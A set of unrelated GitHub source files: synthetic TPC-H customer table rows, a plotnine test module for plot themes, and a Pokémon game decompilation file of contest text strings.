bold, unus 202|Customer#000000202|Q0uJ1frCbi9yvu|7|17-905-805-4635|2237.64|AUTOMOBILE|fully along the carefully pending Tiresias; special packages along the carefully special deposits try to 203|Customer#000000203|2fRlubh lWRinCs1nimADdn|1|11-886-563-6149|7960.63|MACHINERY| packages are. requests integrate regularly across th 204|Customer#000000204|7U7u2KryFP|6|16-761-837-4820|-627.76|BUILDING|ages. accounts wake slyly. dolphins nag blithely. final, regular requests haggle blithely furiously even 205|Customer#000000205|jOTQBGb nhfBMu3,LIN62WogLDBO0w|12|22-356-437-1311|7161.52|BUILDING| furiously pending accounts. ideas along the slyly final deposits cajole blithel 206|Customer#000000206|xsg,ehRHS5OKqyBR5YtoPm8myz|9|19-976-832-3312|-274.79|AUTOMOBILE| the carefully regular foxes. regular accounts wake furiously braids. bold ideas are carefu 207|Customer#000000207|ewz5JNnxJPmPGY|21|31-562-675-6475|-439.98|AUTOMOBILE|n theodolites against the evenly even requests boost carefully pinto beans! fi 208|Customer#000000208|Abye1MwcNfY0KO6yqv,Wwe|19|29-859-139-6234|6239.89|MACHINERY|le carefully according to the quickly silent packages. quickly ironic packages affix according to the ruthles 209|Customer#000000209|iBvmxOZV3qXMYQW3W4Oo7YFhdV|16|26-207-121-7721|8873.46|FURNITURE|deposits. furiously regular ideas across the quietly regular accounts cajole about the express packages. quickly reg 210|Customer#000000210|13cFL9sG1nrGERURN9WZI0|20|30-876-248-9750|7250.14|HOUSEHOLD|nusual instructions sleep regular acc 211|Customer#000000211|URhlVPzz4FqXem|13|23-965-335-9471|4198.72|BUILDING|furiously regular foxes boost fluffily special ideas. carefully regular dependencies are. slyly ironic 212|Customer#000000212|19U0iZ3GtDdrsn|7|17-382-405-4333|957.58|BUILDING|symptotes are blithely special pinto beans. blithely ironic 213|Customer#000000213|NpqMYBhBcWk8mnEta|24|34-768-700-9764|9987.71|HOUSEHOLD|al deposits. final instructions boost carefully. even deposits sleep quickly. furiously regul 214|Customer#000000214|MpCwhcLrbcIM7AeKS9tRM09by|8|18-180-678-6165|1526.59|MACHINERY|grow. fluffily regular pinto beans according to the regular accounts affix quickly pe 215|Customer#000000215|8H76xbBhde HY70BrYqGEFmVPXqlm8pgjjxh|9|19-564-446-4758|3379.20|FURNITURE|al pinto beans. ironic foxes serve. i 216|Customer#000000216|LXH7wSv4I6GG6TAkLOyLcMh559a8Y|21|31-296-111-5448|-776.08|FURNITURE|hely at the pending warhorses; blithe 217|Customer#000000217|YIy05RMdthrXqdfnNKud|23|33-159-298-3849|378.33|AUTOMOBILE|ven frays wake according to the carefully 218|Customer#000000218| V1FCIeSseuyNGYfHS Rx0,sc4IsBfReV|4|14-480-931-8567|9541.19|MACHINERY|lar courts. furiously pending dependencies cajole blithely? fluffily regular deposits cajol 219|Customer#000000219|eTjiL01eyoKiAe2WQoz3EpPg2lvSLeOu2X2wyxK|11|21-159-138-6090|9858.57|AUTOMOBILE|ckly multipliers. carefully eve 220|Customer#000000220|TbUHVhkttz|16|26-201-301-7371|9131.64|BUILDING| even, even accounts are. ironic 221|Customer#000000221|ripNyyPOewg8AahnZlsM|16|26-351-738-1001|1609.39|BUILDING| instructions above the regular requests cajole packages. pending, even 222|Customer#000000222|gAPkFjwxX1Zq 2Yq6 FIfLdJ4yUOt4Al7DL18Ou|1|11-722-672-5418|8893.76|BUILDING|regular accounts haggle furiously around the c 223|Customer#000000223|ftau6Pk,brboMyEl,,kFm|20|30-193-643-1517|7476.20|BUILDING|al, regular requests run furiously blithely silent packages. blithely ironic accounts across the furious 224|Customer#000000224|4tCJvf30WagGfacqcAqmfCptu2cbMVcj2M7Y0W|15|25-224-867-3668|8465.15|BUILDING|counts. bold packages doubt according to the furiously pending packages. bold, regular pinto beans 225|Customer#000000225|2HFk1E0fmqs|13|23-979-183-7021|8893.20|AUTOMOBILE|ages boost among the special foxes. quiet, final foxes lose carefully about the furiously unusual th 226|Customer#000000226|ToEmqB90fM TkLqyEgX8MJ8T8NkK|3|13-452-318-7709|9008.61|AUTOMOBILE|ic packages. ideas cajole furiously slyly special theodolites: carefully express pinto beans acco 227|Customer#000000227|7wlpEBswtXBPNODASgCUt8OZQ|13|23-951-816-2439|1808.23|MACHINERY|lar, ironic pinto beans use! quickly regular theodolites maintain slyly pending pac 228|Customer#000000228|A1Zvuxjdpt8TZP6i41H3fn9csGqOJUm5x0NIS1LA|20|30-435-915-1603|6868.12|FURNITURE| blithely ironic theodolites 229|Customer#000000229|Sbvjxgmwy4u6Ks1FH7lxo7toMmeU5dG|1|11-243-298-4029|7568.07|BUILDING|bold accounts haggle furiously even deposits. regular instruct 230|Customer#000000230|CnR8xt3MYqID0tiHwYh|21|31-744-950-8047|1682.83|MACHINERY|c decoys impress even deposits. thinly final asymptotes 231|Customer#000000231|WFOhG9Z9ohRdsyuYnPvBSv|10|20-825-880-1065|283.55|BUILDING|ly final deposits. fluffily ironic requests wake carefully carefully regular accounts. quickly sp 232|Customer#000000232|oA9o,3YOXu2rzKONdd,cxpqCFXUv5kuxBYKp|22|32-283-563-2674|554.71|HOUSEHOLD|ges sleep. final, bold theodolites are quickly final packages. furiously ironic packages are slyly fi 233|Customer#000000233|mFm45wZ7rV4VIbEE1F4|3|13-574-104-3221|3998.24|FURNITURE|st the special instructions. theodolites detect blithely according 234|Customer#000000234|ILyuJbixVmrNEVxsfQOMFxByySs|18|28-243-424-1393|8383.51|AUTOMOBILE| fluffily regular ideas play s 235|Customer#000000235|bp0rIBMh4fMdQnHBmMnB|3|13-350-790-6416|754.41|AUTOMOBILE|hely ruthless instructions again 236|Customer#000000236|kcW,mM0rhIstAcVaol1,6DVkS FPKlhY|14|24-808-967-4503|5384.59|AUTOMOBILE|te slyly along the requests. carefully final requests sleep slyly blithe frets. furiously ruthless dep 237|Customer#000000237|R dtznB5ocPPo|19|29-414-970-5238|-160.02|HOUSEHOLD|regular pinto beans sleep furiously ironically silent theodolites. quickly ironic courts after the deposits sleep f 238|Customer#000000238|tE0lVKK3tz5AG2 Hal2XHwE485g5MX7|16|26-307-925-1236|3482.32|HOUSEHOLD|uffily ironic theodolites are. regular, regular ideas cajole according to the blithely pending epitaphs. slyly 239|Customer#000000239|w8eRmMOmUTjVOkucbfcGDh2AqCixTOC|9|19-699-117-6988|5398.77|FURNITURE|uctions. furiously even dolphins haggle fluffily according to the furiously regular dep 240|Customer#000000240|SXfeEOwRZsXArtY3C5UWqXgLcJBAMmaynaTJs8|9|19-756-548-7835|7139.68|MACHINERY|al accounts about the slyly pending p 241|Customer#000000241|FBuwHkPR450PvnZnAezcaeMaS,hX3Ifdk|9|19-344-614-2207|6569.34|AUTOMOBILE| across the enticingly even requests. blithely iro 242|Customer#000000242|apgzK3HWAjKHFteJ16Tg3OERViesqBbx|3|13-324-350-3564|1975.41|MACHINERY|riously ironic pinto beans cajole silently. regular foxes wake slyly. bravely 243|Customer#000000243|te2FOn8xJzJinZc|7|17-297-684-7972|620.73|AUTOMOBILE|nic deposits. evenly pending deposits boost fluffily careful 244|Customer#000000244|FBVbCpEVaFaP8KogqQO2VuXeVx|15|25-621-225-8173|2506.38|HOUSEHOLD|encies. requests nag carefully. regularly final accounts h 245|Customer#000000245|IseFIO7jTGPTzAdZPoO2X4VX48Hy|12|22-952-232-2729|3720.15|MACHINERY|s. regular foxes against the s 246|Customer#000000246|WrRUR0ds6iypmopww9y9t0NJBRbke78qJm|15|25-608-618-2590|9584.96|AUTOMOBILE| requests shall have to integrate furiously pending courts. sil 247|Customer#000000247|N8q4W4QQG2mHY47Dg6|20|30-151-905-3513|8495.92|HOUSEHOLD|es affix furiously regular deposits. blithely ironic asymptotes after the blithely e 248|Customer#000000248|mgT15r8asLyaED|10|20-447-727-8914|8908.35|FURNITURE|s detect blithely. blithely pending dolphins along the fluffily final accounts haggle fu 249|Customer#000000249|0XE2fhX7j2uivaHBrFuRl1NoJnaTSIQT|3|13-226-455-7727|-234.01|MACHINERY|its are after the special deposits. ironic, final deposits against the slyl 250|Customer#000000250|9hif3yif6z8w8pW88F755PU7uz|16|26-464-852-1461|2869.97|FURNITURE|s. slyly unusual instructions cajole quickly carefully bold dep
{ "pile_set_name": "Github" }
import os from plotnine import ggplot, aes, geom_point, labs, facet_grid from plotnine import (theme, theme_538, theme_bw, theme_classic, theme_dark, theme_gray, theme_light, theme_linedraw, theme_matplotlib, theme_minimal, theme_seaborn, theme_void, theme_xkcd) from plotnine import element_line, element_text, element_blank from plotnine.data import mtcars _theme = theme(subplots_adjust={'right': 0.80}) def test_add_complete_complete(): theme1 = theme_gray() theme2 = theme_matplotlib() theme3 = theme1 + theme2 assert theme3 == theme2 def test_add_complete_partial(): theme1 = theme_gray() theme2 = theme1 + theme(axis_line_x=element_line()) assert theme2 != theme1 assert theme2.themeables != theme1.themeables assert theme2.rcParams == theme1.rcParams # specific difference for name in theme2.themeables: if name == 'axis_line_x': assert theme2.themeables[name] != theme1.themeables[name] else: assert theme2.themeables[name] == theme1.themeables[name] def test_add_partial_complete(): theme1 = theme(axis_line_x=element_line()) theme2 = theme_gray() theme3 = theme1 + theme2 assert theme3 == theme2 def test_add_empty_theme_element(): # An empty theme element does not alter the theme theme1 = theme_gray() + theme(axis_line_x=element_line(color='red')) theme2 = theme1 + theme(axis_line_x=element_line()) assert theme1 == theme2 l1 = element_line(color='red', size=1, linewidth=1, linetype='solid') l2 = element_line(color='blue', size=2, linewidth=2) l3 = element_line(color='blue', size=2, linewidth=2, linetype='solid') blank = element_blank() def test_add_element_heirarchy(): # parent themeable modifies child themeable theme1 = theme_gray() + theme(axis_line_x=l1) # child theme2 = theme1 + theme(axis_line=l2) # parent theme3 = theme1 + theme(axis_line_x=l3) # child, for comparison assert theme2.themeables['axis_line_x'] == \ theme3.themeables['axis_line_x'] theme1 = theme_gray() + theme(axis_line_x=l1) # child theme2 = theme1 + theme(line=l2) # grand-parent theme3 = theme1 + theme(axis_line_x=l3) # child, for comparison assert theme2.themeables['axis_line_x'] == \ theme3.themeables['axis_line_x'] # child themeable does not affect parent theme1 = theme_gray() + theme(axis_line=l1) # parent theme2 = theme1 + theme(axis_line_x=l2) # child theme3 = theme1 + theme(axis_line=l3) # parent, for comparison assert theme3.themeables['axis_line'] != \ theme2.themeables['axis_line'] def test_add_element_blank(): # Adding onto a blanked themeable theme1 = theme_gray() + theme(axis_line_x=l1) # not blank theme2 = theme1 + theme(axis_line_x=blank) # blank theme3 = theme2 + theme(axis_line_x=l3) # not blank theme4 = theme_gray() + theme(axis_line_x=l3) # for comparison assert theme3 != theme1 assert theme3 != theme2 assert theme3 == theme4 # blanking cleans the slate # When a themeable is blanked, the apply method # is replaced with the blank method. th2 = theme2.themeables['axis_line_x'] th3 = theme3.themeables['axis_line_x'] assert th2.apply.__name__ == 'blank' assert th3.apply.__name__ == 'apply' class TestThemes: g = (ggplot(mtcars, aes(x='wt', y='mpg', color='factor(gear)')) + geom_point() + facet_grid('vs ~ am')) def test_theme_538(self): p = self.g + labs(title='Theme 538') + theme_538() assert p + _theme == 'theme_538' def test_theme_bw(self): p = self.g + labs(title='Theme BW') + theme_bw() assert p + _theme == 'theme_bw' def test_theme_classic(self): p = self.g + labs(title='Theme Classic') + theme_classic() assert p + _theme == 'theme_classic' def test_theme_dark(self): p = self.g + labs(title='Theme Dark') + theme_dark() assert p + _theme == 'theme_dark' def test_theme_gray(self): p = self.g + labs(title='Theme Gray') + theme_gray() assert p + _theme == 'theme_gray' def test_theme_light(self): p = self.g + labs(title='Theme Light') + theme_light() assert p + _theme == 'theme_light' def test_theme_linedraw(self): p = self.g + labs(title='Theme Linedraw') + theme_linedraw() assert p + _theme == 'theme_linedraw' def test_theme_matplotlib(self): p = self.g + labs(title='Theme Matplotlib') + theme_matplotlib() assert p + _theme == 'theme_matplotlib' def test_theme_minimal(self): p = self.g + labs(title='Theme Minimal') + theme_minimal() assert p + _theme == 'theme_minimal' def test_theme_seaborn(self): p = self.g + labs(title='Theme Seaborn') + theme_seaborn() assert p + _theme == 'theme_seaborn' def test_theme_void(self): p = self.g + labs(title='Theme Void') + theme_void() assert p + _theme == 'theme_void' def test_theme_xkcd(self): p = (self.g + labs(title='Theme Xkcd') + theme_xkcd() # High likely hood of Comic Sans being available + theme(text=element_text(family=['Comic Sans MS'])) ) if os.environ.get('TRAVIS'): # Travis does not have the fonts, we still check # to catch any other errors assert p + _theme != 'theme_gray' else: assert p + _theme == 'theme_xkcd'
{ "pile_set_name": "Github" }
@ Contest move effect descriptions gText_HighlyAppealingMove:: @ 827CB82 .string "A highly appealing move.$" gText_UserMoreEasilyStartled:: @ 827CB9B .string "After this move, the user is\nmore easily startled.$" gText_GreatAppealButNoMoreToEnd:: @ 827CBCE .string "Makes a great appeal, but\nallows no more to the end.$" gText_UsedRepeatedlyWithoutBoringJudge:: @ 827CC03 .string "Can be repeatedly used\nwithout boring the JUDGE.$" gText_AvoidStartledByOthersOnce:: @ 827CC34 .string "Can avoid being startled\nby others once.$" gText_AvoidStartledByOthers:: @ 827CC5D .string "Can avoid being startled\nby others.$" gText_AvoidStartledByOthersLittle:: @ 827CC81 .string "Can avoid being startled\nby others a little.$" gText_UserLessLikelyStartled:: @ 827CCAE .string "After this move, the user is\nless likely to be startled.$" gText_SlightlyStartleFrontMon:: @ 827CCE7 .string "Slightly startles the\nPOKéMON in front.$" gText_SlightlyStartleAppealed:: @ 827CD0F .string "Slightly startles those\nthat have made appeals.$" gText_StartleAppealedBeforeUser:: @ 827CD3F .string "Startles the POKéMON that\nappealed before the user.$" gText_StartleAllAppealed:: @ 827CD73 .string "Startles all POKéMON that\nhave done their appeals.$" gText_BadlyStartleFrontMon:: @ 827CDA6 .string "Badly startles the\nPOKéMON in front.$" gText_BadlyStartleAppealed:: @ 827CDCB .string "Badly startles those that\nhave made appeals.$" gText_StartleAppealedBeforeUser2:: @ 827CDF8 .string "Startles the POKéMON that\nappealed before the user.$" gText_StartleAllAppealed2:: @ 827CE2C .string "Startles all POKéMON that\nhave done their appeals.$" gText_ShiftJudgesAttentionFromOthers:: @ 827CE5F .string "Shifts the JUDGE's\nattention from others.$" gText_StartleMonHasJudgesAttention:: @ 827CE89 .string "Startles the POKéMON that\nhas the JUDGE's attention.$" gText_JamOthersMissesTurn:: @ 827CEBE .string "Jams the others, and misses\none turn of appeals.$" gText_StartleMonsMadeSameTypeAppeal:: @ 827CEEF .string "Startles POKéMON that\nmade a same-type appeal.$" gText_BadlyStartleCoolAppeals:: @ 827CF1E .string "Badly startles POKéMON\nthat made COOL appeals.$" gText_BadlyStartleBeautyAppeals:: @ 827CF4D .string "Badly startles POKéMON\nthat made BEAUTY appeals.$" gText_BadlyStartleCuteAppeals:: @ 827CF7E .string "Badly startles POKéMON\nthat made CUTE appeals.$" gText_BadlyStartleSmartAppeals:: @ 827CFAD .string "Badly startles POKéMON\nthat made SMART appeals.$" gText_BadlyStartleToughAppeals:: @ 827CFDD .string "Badly startles POKéMON\nthat made TOUGH appeals.$" gText_MakeMonAfterUserNervous:: @ 827D00D .string "Makes one POKéMON after\nthe user nervous.$" gText_MakeAllMonsAfterUserNervous:: @ 827D037 .string "Makes all POKéMON after\nthe user nervous.$" gText_WorsenConditionOfThoseMadeAppeals:: @ 827D061 .string "Worsens the condition of\nthose that made appeals.$" gText_BadlyStartleMonsGoodCondition:: @ 827D093 .string "Badly startles POKéMON in\ngood condition.$" gText_AppealGreatIfPerformedFirst:: @ 827D0BD .string "The appeal works great if\nperformed first.$" gText_AppealGreatIfPerformedLast:: @ 827D0E8 .string "The appeal works great if\nperformed last.$" gText_AppealAsGoodAsThoseBeforeIt:: @ 827D112 .string "Makes the appeal as good\nas those before it.$" gText_AppealAsGoodAsOneBeforeIt:: @ 827D13F .string "Makes the appeal as good\nas the one before it.$" gText_AppealBetterLaterItsPerformed:: @ 827D16E .string "The appeal works better\nthe later it is performed.$" gText_AppealVariesDependingOnTiming:: @ 827D1A1 .string "The appeal's quality varies\ndepending on its timing.$" gText_WorksWellIfSameTypeAsBefore:: @ 827D1D6 .string "Works well if it's the same\ntype as the one before.$" gText_WorksWellIfDifferentTypeAsBefore:: @ 827D20A .string "Works well if different in\ntype than the one before.$" gText_AffectedByAppealInFront:: @ 827D23F .string "Affected by how well the\nappeal in front goes.$" gText_UpsConditionHelpsPreventNervousness:: @ 827D26E .string "Ups the user's condition.\nHelps prevent nervousness.$" gText_AppealWorksWellIfConditionGood:: @ 827D2A3 .string "The appeal works well if the\nuser's condition is good.$" gText_NextAppealMadeEarlier:: @ 827D2DA .string "The next appeal can be\nmade earlier next turn.$" gText_NextAppealMadeLater:: @ 827D309 .string "The next appeal can be\nmade later next turn.$" gText_TurnOrderMoreEasilyScrambled:: @ 827D336 .string "Makes the next turn's order\nmore easily scrambled.$" gText_ScrambleOrderOfNextAppeals:: @ 827D369 .string "Scrambles the order of\nappeals on the next turn.$" gText_AppealExcitesAudienceInAnyContest:: @ 827D39A .string "An appeal that excites the\naudience in any CONTEST.$" gText_BadlyStartlesMonsGoodAppeals:: @ 827D3CE .string "Badly startles all POKéMON\nthat made good appeals.$" gText_AppealBestMoreCrowdExcited:: @ 827D401 .string "The appeal works best the\nmore the crowd is excited.$" gText_TemporarilyStopCrowdExcited:: @ 827D436 .string "Temporarily stops the\ncrowd from growing excited.$" @ Unused move names gText_RainDance:: @ 827D468 .string "RAIN DANCE$" gText_Rage:: @ 827D473 .string "RAGE$" gText_FocusEnergy:: @ 827D478 .string "FOCUS ENERGY$" gText_Hypnosis:: @ 827D485 .string "HYPNOSIS$" gText_Softboiled:: @ 827D48E .string "SOFTBOILED$" gText_HornAttack:: @ 827D499 .string "HORN ATTACK$" gText_SwordsDance:: @ 827D4A5 .string "SWORDS DANCE$" gText_Conversion:: @ 827D4B2 .string "CONVERSION$" gText_SunnyDay:: @ 827D4BD .string "SUNNY DAY$" gText_Rest2:: @ 827D4C7 .string "REST$" gText_Vicegrip:: @ 827D4CC .string "VICEGRIP$" gText_DefenseCurl:: @ 827D4D5 .string "DEFENSE CURL$" gText_LockOn:: @ 827D4E2 .string "LOCK-ON$" @ Contest type names gContestMoveTypeCoolText:: @ 827D4EA .string "COOL$" gContestMoveTypeBeautyText:: @ 827D4EF .string "BEAUTY$" gContestMoveTypeCuteText:: @ 827D4F6 .string "CUTE$" gContestMoveTypeSmartText:: @ 827D4FB .string "SMART$" gContestMoveTypeToughText:: @ 827D501 .string "TOUGH$" gText_AppealNumWhichMoveWillBePlayed:: @ 827D507 .string "Appeal no. {STR_VAR_1}!\n" .string "Which move will be played?$" gText_AppealNumButItCantParticipate:: @ 827D531 .string "Appeal no. {STR_VAR_1}!\n" .string "But it can't participate!$" gText_MonAppealedWithMove:: @ 827D55A .string "{STR_VAR_1} appealed with\n" .string "{STR_VAR_2}!$" gText_MonWasWatchingOthers:: @ 827D56F .string "{STR_VAR_1} was watching\n" .string "the others.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AllOutOfAppealTime:: @ 827D597 .string "We're all out of\n" .string "Appeal Time!{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" @ Unused appeal result texts gText_ButAppealWasJammed:: @ 827D5C1 .string "But the appeal was\n" .string "jammed.$" gText_FollowedAnotherMonsLead:: @ 827D5DC .string "It followed another\n" .string "POKéMON's lead.$" gText_ButItMessedUp:: @ 827D600 .string "But it messed up.$" gText_WentBetterThanUsual:: @ 827D612 .string "It went better than\n" .string "usual.$" gText_JudgeLookedAwayForSomeReason:: @ 827D62D .string "The JUDGE looked away\n" .string "for some reason.$" gText_WorkedHardToBuildOnPastMistakes:: @ 827D654 .string "It worked hard to build on\n" .string "past mistakes.$" gText_CantMakeAnyMoreMoves:: @ 827D67E .string "It can't make any more\n" .string "moves.$" gText_WorkedFrighteninglyWell:: @ 827D69C .string "It worked frighteningly\n" .string "well.$" gText_WorkedHardAsStandoutMon:: @ 827D6BA .string "It worked as hard as the\n" .string "standout POKéMON.$" gText_JudgedLookedOnExpectantly:: @ 827D6E5 .string "The JUDGE looked on\n" .string "expectantly.$" gText_WorkedRatherWell:: @ 827D706 .string "It worked rather well.$" gText_WorkedLittleBetterThanUsual:: @ 827D71D .string "It worked a little better\n" .string "than usual.$" @ Round result texts gText_MonFailedToStandOutAtAll:: @ 827D743 .string "{STR_VAR_1} failed to\n" .string "stand out at all…{PAUSE_UNTIL_PRESS}$" gText_MonDidntStandOutVeryMuch:: @ 827D764 .string "{STR_VAR_1} didn't stand\n" .string "out very much…{PAUSE_UNTIL_PRESS}$" gText_MonCaughtALittleAttention:: @ 827D785 .string "{STR_VAR_1} caught a\n" .string "little attention.{PAUSE_UNTIL_PRESS}$" gText_MonAttractedALotOfAttention:: @ 827D7A5 .string "{STR_VAR_1} attracted a\n" .string "lot of attention.{PAUSE_UNTIL_PRESS}$" gText_MonCommandedTotalAttention:: @ 827D7C8 .string "{STR_VAR_1} commanded\n" .string "total attention.{PAUSE_UNTIL_PRESS}$" gText_MonHasntMadeItsAppeal:: @ 827D7E8 .string "{STR_VAR_1} hasn't made\n" .string "its appeal.{PAUSE_UNTIL_PRESS}$" @ Unused gText_AnticipationSwelledForMonsAppealNext2:: @ 827D805 .string "Anticipation swelled for\n" .string "{STR_VAR_1}'s appeal next.$" gText_EmptyContestString:: @ 827D830 .string "$" gText_JudgesViewsOnMonHeldFirm:: @ 827D831 .string "The JUDGE 's views on\n" .string "{STR_VAR_1} held firm.$" gText_MonsXChangedPerceptions:: @ 827D855 .string "{STR_VAR_1}'s {STR_VAR_3}\n" .string "changed perceptions.$" gText_MonsAppealEffectWoreOff:: @ 827D872 .string "{STR_VAR_1}'s appeal\n" .string "effect wore off.$" gText_SpecialAppealsEffectWoreOff:: @ 827D88F .string "The special appeal's\n" .string "effect wore off.$" gText_EveryonesAppealsMadeToLookSame:: @ 827D8B5 .string "Everyone's appeals were\n" .string "made to look the same.$" gText_CheapenedMonsAppeal:: @ 827D8E4 .string "It cheapened\n" .string "{STR_VAR_2}'s appeal.$" gText_CheapenedAppealOfThoseAhead:: @ 827D8FE .string "It cheapened the appeal\n" .string "of those ahead.$" gText_StoleAttentionAwayFromMon:: @ 827D926 .string "It stole attention away\n" .string "from {STR_VAR_2}.$" gText_CheapenedMonsAppeal2:: @ 827D947 .string "It cheapened\n" .string "{STR_VAR_2}'s appeal.$" gText_SeverelyCheapenedOtherAppeals:: @ 827D961 .string "It severely cheapened\n" .string "other appeals.$" gText_AnticipationSwelledForMonsAppealNext:: @ 827D986 .string "Anticipation swelled for\n" .string "{STR_VAR_1}'s appeal next.$" gText_CheapenedAppealOfThoseAhead2:: @ 827D9B1 .string "It cheapened the appeal\n" .string "of those ahead.$" gText_CheapenedJudgesFavoriteAppeal:: @ 827D9D9 .string "It cheapened the JUDGE's\n" .string "favorite appeal.$" gText_AppealsOfOthersCheapenedByHalf:: @ 827DA03 .string "The appeals of others\n" .string "were cheapened by half.$" gText_StoodOutToMakeUpForBeingJammed:: @ 827DA31 .string "It stood out to make up\n" .string "for being jammed.$" gText_CantParticipateInAppealsAnyMore:: @ 827DA5B .string "It can't participate in\n" .string "appeals any more.$" gText_TouchedJudgeForFantasticAppeal:: @ 827DA85 .string "It touched the JUDGE for\n" .string "a fantastic appeal.$" gText_AnticipationRoseForUpcomingAppeals:: @ 827DAB2 .string "Anticipation rose for\n" .string "upcoming appeals.$" gText_StoodOutAsMuchAsSpecialAppeals:: @ 827DADA .string "It stood out as much as\n" .string "special appeals.$" gText_StoodOutAsMuchAsMon:: @ 827DB03 .string "It stood out as much as\n" .string "{STR_VAR_1}.$" gText_JammedAppealsMadeEvenLessNoticeable:: @ 827DB1F .string "Jammed appeals were made\n" .string "even less noticeable.$" gText_EveryonesAppealsMadeSame:: @ 827DB4E .string "Everyone's appeals were\n" .string "made the same.$" @ Appeal result texts gText_BecameMoreConsciousOfOtherMons:: @ 827DB75 .string "It became more conscious\n" .string "of the other POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonCantMakeAnAppealAfterThis:: @ 827DBB0 .string "{STR_VAR_1} can't make an\n" .string "appeal after this.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_SettledDownJustLittleBit:: @ 827DBE0 .string "It settled down just a\n" .string "little bit.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_BecameObliviousToOtherMons:: @ 827DC0F .string "It became oblivious to\n" .string "the other POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_BecameLessAwareOfOtherMons:: @ 827DC45 .string "It became less aware of\n" .string "the other POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_StoppedCaringAboutOtherMons:: @ 827DC7C .string "It stopped caring about\n" .string "other POKéMON much.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TriedToStartleOtherMons:: @ 827DCB4 .string "It tried to startle the\n" .string "other POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TriedToDazzleOthers:: @ 827DCE7 .string "It tried to dazzle the\n" .string "others.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_JudgeLookedAwayFromMon:: @ 827DD12 .string "The JUDGE looked away\n" .string "from {STR_VAR_1}.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TriedToUnnerveNextMon:: @ 827DD3D .string "It tried to unnerve the\n" .string "next POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonBecameNervous:: @ 827DD6F .string "{STR_VAR_1} became\n" .string "nervous.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_AppealTriedToUnnerveWaitingMons:: @ 827DD8E .string "The appeal tried to\n" .string "unnerve waiting POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TauntedMonsDoingWell:: @ 827DDC7 .string "It taunted POKéMON\n" .string "doing well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonRegainedItsForm:: @ 827DDF2 .string "{STR_VAR_1} regained its\n" .string "form.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TriedToJamMonDoingWell:: @ 827DE14 .string "It tried to jam POKéMON\n" .string "doing well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_StandoutMonHustledEvenMore:: @ 827DE44 .string "The standout {STR_VAR_1}\n" .string "hustled even more.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_LargelyUnnoticedMonWorkedHard:: @ 827DE73 .string "The largely unnoticed\n" .string "{STR_VAR_1} worked hard.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_WorkedAsMuchAsMonBefore:: @ 827DEA5 .string "It worked as much as\n" .string "POKéMON before it.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealDidNotGoWell:: @ 827DED9 .string "{STR_VAR_1}'s appeal did\n" .string "not go well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_WorkedAsMuchAsPrecedingMon:: @ 827DF02 .string "It worked as much as the\n" .string "preceding POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealDidNotGoWell2:: @ 827DF3A .string "{STR_VAR_1}'s appeal did\n" .string "not go well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealDidNotGoWell3:: @ 827DF63 .string "{STR_VAR_1}'s appeal did\n" .string "not go well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentSlightlyWell:: @ 827DF8C .string "{STR_VAR_1}'s appeal\n" .string "went slightly well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentPrettyWell:: @ 827DFB8 .string "{STR_VAR_1}'s appeal\n" .string "went pretty well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentExcellently:: @ 827DFE2 .string "{STR_VAR_1}'s appeal\n" .string "went excellently.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWasDud:: @ 827E00C .string "{STR_VAR_1}'s appeal was\n" .string "a dud.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealDidNotWorkVeryWell:: @ 827E02F .string "{STR_VAR_1}'s appeal did\n" .string "not work very well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentSlightlyWell2:: @ 827E05F .string "{STR_VAR_1}'s appeal\n" .string "went slightly well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentPrettyWell2:: @ 827E08B .string "{STR_VAR_1}'s appeal\n" .string "went pretty well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentVeryWell:: @ 827E0B5 .string "{STR_VAR_1}'s appeal\n" .string "went very well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentExcellently2:: @ 827E0DD .string "{STR_VAR_1}'s appeal\n" .string "went excellently.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_SameTypeAsOneBeforeGood:: @ 827E107 .string "It's the same type as the\n" .string "POKéMON before--good!{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" 